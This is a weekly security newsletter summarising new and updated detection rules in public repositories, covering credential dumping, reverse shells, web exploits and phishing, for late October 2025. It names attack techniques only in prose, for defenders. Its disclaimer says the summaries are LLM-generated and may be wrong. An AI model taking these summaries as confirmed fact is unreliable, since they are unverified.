This week’s update highlights the most significant changes to detection rules from 8 of the 50+ monitored GitHub repositories. Between Oct 20 and Oct 27, 2025, contributors added 49 new rules and updated 59 existing ones.

Stay informed about the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.

Key Takeaways

• New detections cover multiple recent exploits. Sigma added rules for a Commvault RCE chain and GoAnywhere MFT attacks. Splunk’s content now detects Oracle E-Business Suite exploitation, while new YARA rules find WSUS RCE and WinRAR path traversal vulnerabilities. (SigmaHQ/sigma, splunk/security_content, Neo23x0/signature-base, bartblaze/Yara-rules)

• Cloud detection coverage is expanded for AWS and Azure. New Sigma rules use CloudTrail data to find defense evasion and persistence on AWS. Concurrently, new KQL queries detect lateral movement from compromised Entra ID accounts to Azure VMs and correlate risky sign-ins with phishing clicks. (SigmaHQ/sigma, HybridBrothers/Hunting-Queries-Detection-Rules, benscha/KQLAdvancedHunting)

• Credential dumping rules were refined across multiple repositories. Detections for ProcDump abuse in both Sigma and Splunk were updated to include more command-line flags. They also now monitor for memory dumps of the ‘keyiso’ and ‘samss’ processes in addition to ‘lsass’. (SigmaHQ/sigma, splunk/security_content)

• New analytics target web application attacks and email-based threats. Splunk added rules for HTTP request smuggling and anomalous user agents. Sublime Security improved detection of brand impersonation for Discord and Adobe, while also tuning logic for DocuSign and sextortion emails. (splunk/security_content, sublime-security/sublime-rules)

• Linux and macOS detection logic has been improved. New rules identify post-exploitation techniques like on-host compilation in ‘/dev/shm’ on Linux and the ClickFix attack pattern on macOS. Existing rules for reverse shells and persistence were tuned with new exceptions for common software to lower false positives. (elastic/protections-artifacts, SigmaHQ/sigma, benscha/KQLAdvancedHunting)

🚀 Make updates from this digest operational → All detection rules from this digest are available in our MISP and STIX/TAXII feeds ready for direct integration into your SIEM, TIP, or SOAR solution, boosting your automated threat detection and enriching your existing intel.

Explore the feeds

Table Of Contents

• Corporate repositories (4)

  • SigmaHQ/sigma (+19, ✎9)

  • sublime-security/sublime-rules (+2, ✎4)

  • splunk/security_content (+16, ✎11)

  • elastic/protections-artifacts (+7, ✎34)

• Personal repositories (4)

  • HybridBrothers/Hunting-Queries-Detection-Rules (✎1)

  • benscha/KQLAdvancedHunting (+3)

  • Neo23x0/signature-base (+1)

  • bartblaze/Yara-rules (+1)

• Feedback

• Disclaimer

• Powered by

Corporate repositories (4)

SigmaHQ/sigma (+19, ✎9)

+ New rules

New rules detect multiple exploitation stages for Commvault vulnerabilities. This includes argument injection for auth bypass (CVE-2025-57791), credential abuse attempts (CVE-2025-57788), and post-authentication webshell drops using qoperation.exe (CVE-2025-57790). (Commvault QLogin Argument Injection Authentication Bypass (CVE-2025-57791), Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788), Commvault QOperation Path Traversal Webshell Drop (CVE-2025-57790))

AWS monitoring capabilities are expanded with new rules that use CloudTrail data. Detections now cover brute-force attempts, S3 bucket and VPC Flow Log deletion for defense evasion, console logins from unusual locations, persistence via enabling new regions, and credential validation using the TruffleHog tool. (AWS ConsoleLogin Failed Authentication, AWS Bucket Deleted, AWS Console Login Monitoring, AWS VPC Flow Logs Deleted, AWS EnableRegion Command Monitoring, AWS STS GetCallerIdentity Enumeration Via TruffleHog)

Two new rules target post-compromise activity on web-facing applications. One detects suspicious file writes to Apache or Tomcat web roots, indicative of webshell deployment. The other identifies anomalous child process execution from GoAnywhere MFT, a behavior linked to exploitation of CVE-2025-10035. (Suspicious File Write to Webapps Root Directory, Potential Exploitation of GoAnywhere MFT Vulnerability)

Coverage for adversary TTPs on Windows is improved. New rules detect the installation and use of Kali Linux via WSL, misuse of the Restic backup tool for data exfiltration, and the deletion of the RunMRU registry key to hide command execution history. (RunMRU Registry Key Deletion - Registry, RunMRU Registry Key Deletion, Installation of WSL Kali-Linux, WSL Kali-Linux Usage, PUA - Restic Backup Tool Execution)

New detections identify adversary activity through system and network configuration changes. These include lateral movement attempts via unsecured SMB shares on Windows, potential mitm6 attacks using ISATAP router configuration, and a Linux persistence technique that disables system power management via systemctl mask. (Mask System Power Settings Via Systemctl, ISATAP Router Address Was Set, Unsigned or Unencrypted SMB Connection to Share Established)

✎ Modified rules

Detection of file downloads via PowerShell is updated across three rules. Two rules targeting web requests from command line and scriptblock logs were refined by removing the ‘Net.WebClient’ condition to reduce noise. A third rule was broadened to detect download commands executed from the PowerShell ISE process. (Usage Of Web Request Commands And Cmdlets - ScriptBlock, PowerShell Download Pattern, Usage Of Web Request Commands And Cmdlets)

Two rules targeting credential dumping were improved. Detection of LSASS memory dumps via ProcDump now includes more command-line flags and targets additional security processes like ‘keyiso’ and ‘samss’. Detection for the Windows Credential Editor tool was updated to use specific image names and a wider set of import hashes. (Potential LSASS Process Dump Via Procdump, HackTool - Windows Credential Editor (WCE) Execution)

System reconnaissance detection is improved through two rule updates. One rule broadens coverage for WMI-based disk and volume discovery using wmic.exe. The other adds OriginalFileName checks for common user discovery utilities like whoami.exe and quser.exe to make detection more robust. (System Disk And Volume Reconnaissance Via Wmic.EXE, Local Accounts Discovery)

A rule for detecting persistence via Windows startup folders was updated. The list of monitored file extensions was significantly expanded to include ‘.cmd’, ‘.dll’, ‘.js’, and ‘.wsf’, among others, providing wider coverage for this common technique. (Suspicious Startup Folder Persistence)

A rule detecting defense evasion through the use of Windows 8.3 short name paths was updated. The logic was refactored with more specific filter groups for system processes and installers, improving the clarity and precision of exclusions. (Use Short Name Path in Image)

sublime-security/sublime-rules (+2, ✎4)

+ New rules

New rules detect phishing attacks that impersonate notifications from Adobe Creative Cloud and Discord. The Adobe rule identifies messages from newly observed email addresses. The Discord rule uses multiple checks including sender display name, domain analysis, logo detection, and DMARC failure to spot fraudulent notifications. (Service abuse: Adobe Creative Cloud share from an unsolicited sender address, Brand impersonation: Discord notification)

✎ Modified rules

Detection for various email-based phishing and impersonation tactics was refined. Updates improve identification of spoofed calendar invites by correctly handling DMARC authentication results. DocuSign phishing detection in PDFs is broadened through more flexible analysis of file components. False positives in Booking.com brand impersonation detection are reduced by excluding Microsoft quarantine notifications. (Attachment: ICS calendar with embedded file from internal sender with SPF failure, Brand impersonation: DocuSign PDF attachment with suspicious link, Brand impersonation: Booking.com)

Detection coverage for extortion and sextortion emails is expanded. The rule now incorporates an additional Natural Language Understanding topic, ‘Financial Communications’, and includes an updated regex to identify obfuscated cryptocurrency terms. (Extortion / sextortion (untrusted sender))

splunk/security_content (+16, ✎11)

+ New rules

New rules detect various web attack techniques. The primary focus is on HTTP request smuggling, identifying duplicated headers, conflicting Content-Length and Transfer-Encoding headers, and an IIS-specific variant using reserved device names. Other rules find rapid POST request floods and reconnaissance activity using non-browser user agents. (HTTP Rapid POST with Mixed Status Codes, HTTP Duplicated Header, HTTP Possible Request Smuggling, HTTP Request to Reserved Name on IIS Server, HTTP Suspicious Tool User Agent)

Two rules were added to detect exploitation of Oracle E-Business Suite vulnerabilities CVE-2025-61882 and CVE-2025-61884. Detections monitor Cisco Secure Firewall logs for specific intrusion signature IDs. One rule correlates multiple related signatures from the same source and destination to identify a multi-stage attack. (Cisco Secure Firewall - Oracle E-Business Suite Exploitation, Cisco Secure Firewall - Oracle E-Business Suite Correlation)

New detections target the use of common adversary tools on Windows endpoints. The rules identify the execution of network scanners like Advanced IP Scanner and reconnaissance utilities from the PsTools suite. Another rule detects the creation of NirSoft tool ZIP archives, often used to stage credential harvesting utilities. (Advanced IP or Port Scanner Execution, Windows NirSoft Tool Bundle File Created, Windows PsTools Recon Usage)

Two new analytics target PowerShell-based defense evasion techniques. One rule detects attempts to weaken Windows Defender by disabling Attack Surface Reduction rules with Set-MpPreference. The other identifies manual Base64 decoding routines in command lines, used to bypass standard encoded command detection. (Windows Defender ASR or Threat Configuration Tamper, Windows PowerShell Process Implementing Manual Base64 Decoder)

New coverage added for malicious execution techniques that abuse legitimate system functions. Detections identify WMI spawning LOLBAS binaries, processes launched from RDP shares (\\tsclient\\), use of wbadmin.exe to restore files, and remote code execution by piping downloaded content directly to a shell. (Wmiprvse LOLBAS Execution Process Spawn, File Download or Read to Pipe Execution, Windows Process Execution From RDP Share, Windows WBAdmin File Recovery From Backup)

✎ Modified rules

Detection for LOLBAS binaries making outbound network connections was improved across multiple rules. The updates for regasm.exe, Regsvcs.exe, and a general list of LOLBAS executables now use a more comprehensive set of private and reserved IP address ranges for exclusion. This change reduces false positives from legitimate internal network traffic. (Detect Regasm with Network Connection, Detect Regsvcs with Network Connection, LOLBAS With Network Traffic)

Coverage for reconnaissance techniques was expanded. Detection for Active Directory enumeration via AdFind.exe was broadened to include more command-line arguments. The rule for event log discovery was updated to check both the process name and original filename of tools like wevtutil.exe, countering simple evasion by renaming. (Windows EventLog Recon Activity Using Log Query Utilities, Windows AdFind Exe)

Rules targeting defense evasion and credential access were updated. Detection for Windows Defender tampering now covers additional Set-MpPreference parameters and specific values that disable security features. The procdump.exe rule was expanded to find more command-line flags and monitor for dumping of keyiso and samss processes in addition to lsass. (Dump LSASS via procdump, Powershell Disable Security Monitoring)

Two rules that detect anomalous network activity from non-standard file paths were refined. Detections for SMTP and FTP connections now use more specific, fully-qualified paths for process image exclusions. This narrows the filter criteria for legitimate application directories and improves detection accuracy. (Windows Mail Protocol In Non-Common Process Path, Windows File Transfer Protocol In Non-Common Process Path)

Post-exploitation detections were broadened. The rule for SSH abuse now identifies LocalCommand in addition to ProxyCommand and checks for more child processes like pwsh.exe and wmic.exe. The rule for privilege escalation was updated to more reliably identify when a newly created account is added to the local administrators group. (Detect New Local Admin account, Windows SSH Proxy Command)

elastic/protections-artifacts (+7, ✎34)

+ New rules

New detections for Windows post-exploitation focus on defense evasion and credential access. These rules identify unsigned processes reading credential stores, the use of ClipUp.exe to overwrite protected files, and anomalous child processes of the Trend Micro Security Agent. (Sensitive File Access by an Unsigned Process, Potential Evasion via ClipUp Execution, Suspicious Trend Micro Security Agent Child Process)

Two new rules address reconnaissance and command and control. One detects suspicious LDAP search queries for domain user enumeration. The other identifies the VS Code ‘tunnel’ command, which can be misused for C2 or data exfiltration. (Attempt to establish VScode Remote Tunnel, Domain Accounts Enumeration via LDAP Search)

New rules improve coverage for Linux and macOS. One rule detects on-host compilation in /dev/shm on Linux, a ‘Compile After Delivery’ technique. Another identifies script creation on macOS immediately following network connections to suspicious TLDs. (Linux Compilation in Suspicious Directory, File Download from Suspicious Top Level Domain)

✎ Modified rules

Multiple Linux rules for detecting reverse shells, web server attacks, and system utility abuse were tuned to reduce false positives. The updates add exclusions for legitimate activity from development tools, container runtimes, Ansible automation, and the CUPS printing system (related to CVE-2024-47176). Some rules also gained new process termination actions. (Potential Reverse Shell Activity via Terminal, Chattr Execution from Unusual Parent, Linux Suspicious Child Process Execution via Interactive Shell, Printer User (lp) Shell Execution, Netcat Reverse Shell via Busybox, Suspicious Mining Process Events, Suspicious Execution via a Hidden Process, Decode Activity via Web Server, Suspicious Download and Redirect by Web Server, Potential Web Server Directory Traversal)

Several Windows rules targeting credential access and privilege escalation were tuned. Updates add exceptions for security agents like Tanium and Sophos, Windows migration tools, and legitimate system setup executables. This improves the accuracy of detections for LSASS access, credential manager theft, and privilege escalation via token impersonation. (LSASS Access Attempt from Unbacked Memory, Potential Browser Credentials Stealer, Potential Discovery of Windows Credential Manager Store, Potential Privilege Escalation via Token Impersonation, Suspicious Impersonation as Trusted Installer, Privilege Escalation via EXTENDED STARTUPINFO, Potential Execution via Token Theft)

A broad set of Windows rules for defense evasion and execution were refined to lower false positives. Updates add exclusions for administrative tools and legitimate applications across detections for LOLBIN abuse (curl, PowerShell, rundll32), process injection, kernel driver exploits (including CVE-2024-21338), and Office template persistence. Some rule logic was also simplified. (Ingress Tool Transfer via CURL, Potential CVE-2024-21338 Exploitation, Potential Masquerading as SVCHOST, Potential Evasion with Hardware Breakpoints, Potential Evasion via Invalid Code Signature, Process Explorer Device Access by Unusual Process, Unusual Network Connection via RunDLL32, Windows Console Execution from Unbacked Memory, Suspicious API Call from a PowerShell Script, Suspicious Command Shell Execution via Windows Run, Suspicious Windows Script Interpreter Child Process, Office Application Startup via Template File Modification, Suspicious Windows Schedule Child Process)

Four macOS rules were updated to reduce false positives from common software. Exclusions were added for legitimate system management tools like jamf and NinjaRMM, Python development environments, and software such as Cisco Secure Client. The updates improve the accuracy of detections for persistence via Launch Agents and execution from mounted devices. (Suspicious Task for Pid System Call, Suspicious Script or Process Execution from Mounted Device, Terminal closed with Pkill or Killall, Persistence via Suspicious Launch Agent or Launch Daemon)

Cyber OSINT Overview is a free weekly newsletter by CTIChef.com that summarizes updates from 80+ sources (government orgs, cybersecurity vendors, threat intel teams, security researchers, and cybersecurity communities) into one overview.

Read the latest issue

Personal repositories (4)

HybridBrothers/Hunting-Queries-Detection-Rules (✎1)

✎ Modified rules

A new KQL rule detects lateral movement from a compromised Entra ID account to Azure or Azure Arc virtual machines. The detection triggers when a user with pre-existing risk events in Entra ID Identity Protection deploys custom scripts or run commands, indicating a possible cloud control plane compromise. (Detect Custom Script or Run Command deployment by risky user)

benscha/KQLAdvancedHunting (+3)

+ New rules

New rules target phishing and impersonation. One rule detects a single Gmail sender using multiple display names, indicating impersonation attempts. Another identifies risky Azure AD sign-ins from outside defined IP ranges that occur shortly after a user clicks a URL, suggesting a phishing-initiated account compromise. (Risky SignIn after EmailUrlClickEvent, Gmail Sender with Multiple Display Names)

A new KQL rule detects the macOS ClickFix attack pattern. It identifies a base64 command executed by a shell, followed within seconds by a curl command downloading content, to spot attempts to run malicious payloads. (macOS ClickFix Attack with Base64 encrypted curl Command)

Neo23x0/signature-base (+1)

+ New rules

A new YARA rule detects exploitation of the WSUS remote code execution vulnerability CVE-2025-59287. Detection logic targets specific error traceback strings in WSUS logs and base64-encoded PowerShell commands used for discovery. (EXPL_WSUS_Exploitation_Indicators_Oct25)

bartblaze/Yara-rules (+1)

+ New rules

A new YARA rule detects RAR archives exploiting the WinRAR path traversal vulnerability (CVE-2023-38831). The rule identifies a specific Alternate Data Stream path traversal string used to place malicious script or executable files in arbitrary locations upon extraction. (WinRAR_ADS_Traversal)

Feedback

Your input helps us improve! If you spot any issues, mistakes, or omissions in this digest issue, or have any other suggestions, we’d love to hear from you. Contact us at team@rulecheck.io - we value your feedback and are committed to improving the content we produce.

Disclaimer

The summaries in this brief are generated by LLM model based on the provided system and user prompts. While every effort is made to consolidate accurate and relevant insights, the model may occasionally misinterpret, misrepresent, or hallucinate information. Readers are strongly advised to verify all key points by consulting the original sources linked in the brief for complete context and accuracy.

Powered by

This digest is built with BlackStork.

Looking for a customized version of this newsletter? We’d be happy to help — contact us.